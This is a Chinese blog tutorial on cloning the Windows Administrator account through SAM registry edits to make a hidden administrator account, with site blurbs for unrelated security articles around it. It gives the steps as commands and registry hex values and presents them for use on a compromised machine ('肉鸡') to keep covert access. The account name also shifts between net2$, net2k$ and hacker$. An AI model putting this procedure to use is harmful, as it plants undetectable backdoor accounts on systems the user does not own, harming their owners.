手工建立超级隐藏用户

手工思维链到自动推理:大模型时代的人机协作演进与进阶实践 思维链(Chain of Thought)是一种引导大语言模型进行复杂推理的技术方法,其核心原理是通过结构化、分步的提示词,将人类的思考过程外化,从而引导模型模仿并生成逻辑清晰的推理路径。这一技术显著提升了模型在数学推理、逻辑分析等复杂任务中的表现力和可解释性,是早期提示词工程的关键突破。随着GPT-4o、Claude 3.5 Sonnet等新一代模型内化了推理能力,显式的“手工思维链”提示需求降低,标志着从“人教模型思考”到“模型自主推理”的范式迁移。这虽然提升了通用问题求解的效率,但也引发了关于开发者对 阅读详情

   2K中的regedit.exe和regedt32.exe
    XP中的regedit.exe和regedt32.exe
    win2003中的regedit.exe和regedt32.exe
    都有两个注册表编辑器,实为一个程序。对regedit.exe我想大家都应该很熟悉的啦,但却不能对注册表的项键设置权限,而regedt32.exe最
大的优点就是能够对注册表的项键设置权限。nt/2000/xp/2003的帐户信息都在注册表的HKEY_LOCAL_MACHINE/SAM/SAM键下,但是除了系统用户
SYSTEM外,其它用户都无权查看到里面的信息。下面介绍一下这个sam
    SAM(Security Accounts Manager安全帐户管理器)负责SAM数据库的控制和维护。SAM数据库位于注册表HKLM/SAM/SAM下,受到ACL保护,
可以使用regedt32.exe打开注册表编辑器并设置适当权限查看SAM中的内容。SAM数据库在磁盘上就保存在%systemroot%system32/config/目录
下的sam文件中,在这个目录下还包括一个security文件,是安全数据库的内容,听高手说两者有不少关系。(由于本人太菜,并不太了解)
SAM数据库中包含所有组、帐户的信息,包括密码HASH、帐户的SID等。现以我分析的系统---中文Win2003 Server为例。(不好意思,因为我没
装2K:()
    首先用regedt32.exe(2003用regedit也一样)对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。展开注册
表HKEY_LOCAL_MACHINE_SAM:
|---- SAM
|----Domains
| |----Account
| | |---- Aliaese
| | | |---- 000003E8
| | | |----000003EA
| | | |----000003EA
| | | |---- Members
| | | | |----S-1-5
| | | | | |----000003EA
| | | | | |----00000013
| | | | | |----00000013
| | | | |----S-1-5-21-3179286488-61192537-2235348617
| | | | |----000003E9
| | | | |----000003ED
| | | |----Name
| | | |----HelpServicesGroup
| | | |----IIS_WPG
| | | |----TelnetClients
| | |----Grpup
| | | |----00000201
| | | |----Name
| | | |----None
| | |----Users
| | |----000001F4
| | |----000001F5
| | |----000003E9
| | |----000003EC
| | |----000003ED
| | |----Names
| | |----Net2k$
| | |----Guest
| | |----IUSR_NET2K-KAXXY6SZ3
| | |----IWAM_NET2K-KAXXY6SZ3
| | |----SUPPORT_388945a0
| |----Builtin
| |----Aliases
| | |----00000220
| | |----00000221
| | |----00000222
| | |----00000223
| | |----00000226
| | |----00000227
| | |----00000228
| | |----0000022B
| | |----0000022C
| | |----0000022E
| | |----0000022F
| | |----Members
| | | |----S-1-5
| | | | |----00000004
| | | | |----0000000B
| | | | |----00000014
| | | |----S-1-5-21-3179286488-61192537-2235348617
| | | |----000001F4
| | | |----000001F5
| | | |----000003EC
| | |----Names
| | |----Administrators
| | |----Backup Operators
| | |----Guests
| | |----Network Configuration Operators
| | |----Performance Log Users
| | |----Performance Monitor Users
| | |----Power Users
| | |----Print Operators
| | |----Remote Desktop Users
| | |----Replicator
| | |----Users
| |----Groups
| | |---Names
| |----Users
| |----Names
|----RXACT
这是我机器上注册表中SAM数据库的结构,SAM树。在整个数据库中,帐号主要内容存在于下面这些位置:在/Domains/下就是域(或本机)中的
SAM内容,其下有两个分支“Account”和“Builtin”。/Domains/Account是用户帐号内容。/Domains/Account/Users下就是各个帐号的信息。
其下的子键就是各个帐号的SID相对标志符。比如000001F4,每个帐号下面有两个子项,F和V。其中/Names/下是用户帐号名,每个帐号名只有
一个默认的子项,项中类型不是一般的注册表数据类型,而是指向标志这个帐号的SID最后一项(相对标识符),比如其下的Administrator,
类型为0x1F4,于是从前面的000001F4就对应着帐户名administrator的内容。如果我们把某个帐号中的类型改为0x1F4,那么这个帐号将被指向
类000001F4的帐户。而这个帐号000001F4就是administrator帐户,这样,系统在登录过程中就把被修改的帐号完全转为了administrator帐号,
经过修改的帐号所使用的所有内容、信息都是adminisrtator内容,包括密码、权限、桌面、记录、访问时间等等,这就是达到了所谓的克隆
超级管理员帐号的目的。由于本人水平所限,SAM数据库的不再多作介绍了,想要了解更多的,可以自己去查找资料.下面主要是介绍如何实现
这个克隆并隐藏帐号的步骤了。
    了解了这些,接下来的工作也就更容易去做了。
     具体步聚如下:
     1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:
net2$,这里我在命令行下建立这个帐户,如下:
net user net2k$ 123456 /add
    2、在“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。
打开键:HKEY_LOCAL_MAICHINE/SAM/SAM/Domains/account/user/names/net2k$"
   3、将项net2$、000003F2、000001F4导出为kelong.reg、3f2.reg、admin.reg,用记事本分别把这几个导出的文件进行编辑,将超级用户对
应的项000001F4下的键"F"的值复制,并覆盖NET2K$对应的项000003F2下的键"F"的值,详细步骤、内容如下:
项000001F4下的键"F"的内容:
"F"=hex:02,00,01,00,00,00,00,00,58,35,e6,ba,b7,85,c4,01,00,00,00,00,00,00,00,/
  00,6a,09,b0,b2,6f,71,c4,01,00,00,00,00,00,00,00,00,32,47,ec,f7,5c,84,c4,01,/
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,86,00,01,00,00,00,00,/
  00,00,00,00,00,00,00
帐号NET2K$对应的SID项000003F2下的键"F"的内容:
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/
  00,ce,21,90,ca,eb,85,c4,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/
  f2,03,00,00,01,02,00,00,10,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,/
  00,00,00,00,00,5f,00
然后再将03F2.reg与kelong.reg合并后执行导入。
    4、在命令行下执行net user net2k$ /del将用户net2k$删除:net user net2k$ /del
    到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE/SAM/SAM键权限改回原
来的样子。
    注意:隐藏的超级用户建好后,在帐户管理器看不到net2k$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,
就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,据说不能删除,我倒
没试过。至于如何在命令行下远程建立隐藏的超级用户,这里就不多说了,只要你dos命令好,手工克隆也完全不是问题,方法都一样,只是要
讲究操作技巧了……
    呵呵,从下午5点多开始写这篇文章,到现在已经是晚上21:20分了,腰都酸了,累,洗澡去了……^_^
    


 

从TCP层自组HTTP包绕过WAF:超级SQL注入工具原理与实战 SQL注入作为Web安全领域的经典漏洞,其核心原理在于应用程序未对用户输入进行充分过滤,导致恶意SQL语句被拼接执行。传统检测工具通常基于高层HTTP库,其标准化的请求格式容易被Web应用防火墙(WAF)识别和拦截。为了突破这一限制,一种思路是深入到网络协议的底层,通过TCP Socket手动组装和发送HTTP请求,从而实现对数据包字节级的精细控制。这种技术价值在于能够利用WAF解析器与后端Web服务器解析器之间的差异,通过构造畸形的、但服务器能容忍的HTTP请求(如打乱头部顺序、使用非常规分隔符、混合多种 阅读详情

相关推荐

拥有特权 使用system账户

大家知道,SYSTEM是至高无上的超级管理员帐户。默认情况下,我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Windows桌面环境。实际上SYSTEM帐户早就已经“盘踞”在系统中了。想想也是,连负责用户验证的Winlogon、Lsass等进程都是以SYSTEM身份运行的,谁还能有资格检验SYSTEM呢?既然SYSTEM帐户早就已经出现在系统中,所以只需以SYSTEM帐户的身份启动Wind

ykblog.github.io 3034

SQL注入实战指南:从手工探测到自动化工具利用

SQL注入是一种通过将恶意SQL代码插入到应用输入参数中,从而操纵后端数据库查询的经典Web安全漏洞。其原理在于应用程序未对用户输入进行充分验证和过滤,使得攻击者能够改变原始SQL语句的逻辑结构。理解SQL注入原理对于构安全的应用架构至关重要,它直接关系到数据保密性、完整性和可用性。在工程实践中,掌握SQL注入技术不仅能用于渗透测试和漏洞评估,更是开发人员编写安全代码、实施有效防御(如参数化查询)的基础。常见的应用场景包括对Web应用进行授权安全测试、CTF竞赛解题以及代码安全审计。本文将聚焦于`sqlm

congsong2560的博客 433

Copilot Pro用户为何突然无法使用Claude Opus模型?

AI编程助手的核心能力依赖于底层大模型的稳定性与可控性。当开发者选择Copilot Pro这类订阅服务时,实际购买的是对特定高性能模型(如Claude Opus)的确定性调用权。其技术原理在于服务端动态路由与API级模型授权策略,而非本地插件配置;这种机制虽提升平台运营效率,但也带来功能边界模糊、体验不可预测等工程风险。在代码理解深度、长上下文推理和API文档生成等关键场景中,Opus类模型展现出显著技术价值。当前事件折射出云原生AI工具链中‘模型主权’缺失的普遍困境,推动开发者转向直连Anthropic

weixin_33690367的博客 293

巧用注册表建立超级隐藏账户

  1、首先,在cmd下建立一个账户并加入administrators组  2、运行regedit,找到sam键,会发现下面的内容为空。其实这里面是有内  容的,只是我们的权限不够。虽然管理员默认权限很大,但是出于一些安  全因素考虑,一些权限默认还是没有给的,需要手工设置。我们单击sam下  的sam右键进行权限设置。设置完权限F5刷新即可看到内容。  3、找到新

小尚的学习笔记 1696

教您在XP桌面上建立“终极隐藏”文件

<br />教您在XP桌面上建立“终极隐藏”文件<br /><br />Windows XP中的这个方法不是右键改属性为隐藏,也不是进入DOS下修改属性。做起来不难,效果也非常有趣,谁也想不到,就在你电脑液压扳手桌面上堂而皇之的藏有你的“机密文件”吧? <br /><br />1、在桌面一个文件夹<br /><br />2、右键,自定义图标为横向12排,纵向第2排的空白图标<br /><br />3、这下图标隐形了<br /><br />4、选择文件夹的名称,右键,选择工业吸尘器插入unicode控制字符

myspacejing的专栏 519

如何解决无法显示隐藏文件夹

      前几天还在电脑公司上班的时候,发现有相当数量的顾客的硬盘一般除了C盘外,双击盘符无法打开,对于个人普通用户这种简单问题自然也要找人了!点击鼠标右键发现第一项并非是打开,而是一个什么AUTO之类的东西。不用说自然是中招了,一般来讲电脑公司习惯于装系统了事,简单吗,在电脑公司来三五天的人都能做到。不过具我们公司的技术学员和客户反应重新装系统之后(万能克隆几分钟就搞定了),无法解决问题!本人

1万+

ms SQL手工注入,及高级操作

ms SQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。SQL Server一开始并不是微软自己研发的产品,而是当时为了要和IBM竞争时,与Sybase合作所产生的,其最早的发展者是Sybase,同时微软也和Sybase合作过 SQL Server 4.2版本的研发...

test\\的博客 322

关于计算机excel表格的知识,这知识只有高手懂!聊聊你不认识的Excel超级

【PConline 应用】Excel对于我们来说,再熟悉不过了。算算数字,做做图表,再不济还能搞个可视化分析,总之玩法多多。不过有一项功能却很少被人所提及,这就是“超级表”。简单来说,超级表可以让我们的表格操作更轻松,能够快速实现排序、筛选、格式设置等基础操作。最关键的是,你压根不需要做什么特殊设置,即可使用“超级表”功能。好了,一起来看看吧。1. 先说一点最重要的!如何插入“超级表”“超级表”是...

weixin_31411427的博客 793

用户用户组管理--用户管理相关文件——家目录(/home/用户名/ 和 /root/)、用户的邮箱(/var/spool/mail/用户名/)、用户模板目录( /etc/skel/)

1、用户的家目录 普通用户:/home/用户名/,所有者和所属组都是此用户,权限是700 超级用户:/root/,所有者和所属组都是root用户,权限是550 对Linux来讲,用户的初始登录位置称为用户的家或者称为家目录,用户在家目录默认是拥有所有者权限的,也就是说读写执行权限都有。 普通用户超级用户的家目录并不一样。普通用户是在/home/用户名/,例如user1用户的家目录就是/h...

weixin_45116657的博客 3446

ChatGPT不是工具,而是可协作的超级心智

大语言模型(LLM)正从传统AI工具演变为具备意图协商、动态知识耦合与元认知能力的‘认知协作者’。其核心原理在于融合事实性知识、程序性知识和元认知知识,支撑真实场景中的意图澄清、多轮追问与情境适配输出。这种能力带来显著的技术价值:降低专业门槛、实现认知能力平权,并在教育、法律、制造等场景中重构信息聚合、格式转换与个性化生成等工作流。尤其在中文语境下,结合角色锚定、约束定义与领域精炼等提问工程实践,可大幅提升协作效能。本文聚焦ChatGPT作为‘超级心智’的本质特征与落地方法论。

weixin_30824599的博客 346

M365 Copilot超级搜索:自然语言驱动的企业知识操作系统

企业搜索正从关键词匹配迈向意图理解——自然语言搜索不再依赖用户记忆准确术语,而是基于工作角色、组织架构与业务流程构动态意图图谱。其核心技术并非通用大模型,而是深度集成M365数据权限、业务规则与上下文感知的Work IQ知识操作系统。该系统通过实体识别、关系模与时效加权,实现跨邮件、文档、会议、CRM等多源数据的语义关联与精准编织,交付可直接使用的答案而非文件列表。典型应用场景包括项目风险实时聚合、HR人才全景盘点、法务条款全量合规比对等。本文深入解析Work IQ如何将Copilot从聊天界面升维为组

weixin_33981932的博客 355

盲盒产品设计解析:从惊喜机制到用户体验的完整拆解

盲盒作为一种融合了收集、惊喜与情感投射的消费模式,其底层逻辑在于通过精心设计的随机性机制和情感化设计,创造持续的用户参与感。从技术原理上看,它构了一套完整的“刺激-反馈”循环,利用稀缺性梯度、系列化收集和社交互动等机制,驱动用户行为并延长产品生命周期。这种设计思路在用户体验和产品运营中具有重要价值,广泛应用于潮玩、游戏道具和营销活动等领域。本文以近期热门的“奇趣猫宠”盲盒为例,深入剖析其“盲蛋”包装、猫耳萌宠设计以及“小随机、大保底”的惊喜机制,探讨这类产品如何精准把握用户心理,实现从物理玩具到情感载体的

weixin_33778544的博客 602

hping3、nping、masscan三大超级Ping工具实测对比与CDN绕过实战

在网络探测与安全评估领域,主机存活探测和端口扫描是信息收集的基础环节。其核心原理是通过发送特定协议的数据包并分析响应,来判断目标状态和网络拓扑。传统ICMP Ping在复杂网络环境中易被过滤,因此TCP Ping、UDP Ping等替代技术应运而生,它们通过多协议探测提升了侦察的可靠性和隐蔽性。这些技术的工程价值在于能够有效应对防火墙、CDN和云WAF的防护策略,是渗透测试和网络诊断中绕过防御、定位真实资产的关键手段。在实际应用场景中,安全从业者常需综合运用多种工具进行CDN溯源和资产发现。本文聚焦于hpi

weixin_30555515的博客 412

模板驱动型文档自动化:从Word手工到流水线生成

文档自动化是企业提升交付效率与内容一致性的关键技术,其核心在于将非结构化写作转化为可复用、可编程、可验证的工程实践。基于模板驱动和结构化内容两大原理,系统通过解耦数据源与呈现逻辑,实现一键生成多格式文档的技术价值。广泛应用于SaaS市场部批量产出白皮书、咨询公司快速响应客户提案、法务与销售协同生成合规合同等高频场景。本文深入解析Sqribble模板的四层架构设计、数据源集成策略及真实落地避坑经验,为构稳定、安全、高性能的文档流水线提供完整方法论。

weixin_30340617的博客 384

Excel筛选全攻略:从基础筛选到VBA自动化,提升数据处理效率

数据筛选是数据处理与分析中的基础且核心的操作,它允许用户从庞杂的数据集中快速定位符合特定条件的记录。其原理在于通过设定逻辑条件,对数据行进行显示、隐藏或提取,从而实现对数据的快速查询与整理。掌握高效的数据筛选技术,能极大提升数据处理的准确性和效率,减少重复性手工劳动,是职场人士必备的技能。在实际工作中,数据筛选广泛应用于销售数据分析、人员信息管理、财务报表制作等场景,帮助用户从海量数据中精准提取有价值的信息。本文聚焦于Excel这一主流工具,系统讲解其分层筛选能力体系,涵盖自动筛选、高级筛选、FILTER函

weixin_30388677的博客 335

MySQL用户权限体系:三维坐标模型与生产级实践

MySQL用户权限不是简单的账号创与授权操作,而是一套基于用户标识('user'@'host')、权限粒度(GLOBAL/DATABASE/TABLE/COLUMN等)和权限类型(SELECT/INSERT/DROP等)的三维动态权限模型。其核心原理在于权限数据落盘于mysql系统表,需FLUSH PRIVILEGES刷新内存缓存才能生效;权限匹配严格遵循host通配规则(如'localhost'不等价于'127.0.0.1'),且MySQL 8.0默认caching_sha2_password认证插件带

weixin_30883311的博客 362

分析最新变种的"熊猫烧香"及其清除方法

中文名称:(尼姆亚,熊猫烧香)文件名称:nvscv32.exe病毒名称:目前各杀毒软件无法查杀病毒大小:68,570 字节编写语言:Borland Delphi 6.0 - 7.0加壳方式:FSG 2.0 -> bart/xt发现时间:2007.1.16危害等级:高一、病毒描述:含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启

LoveYou1999的专栏 1442
上一篇: 主页加速技巧
下一篇: 一次ADSL远程入侵
net2kc
博客等级 码龄22年 0粉丝 25原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值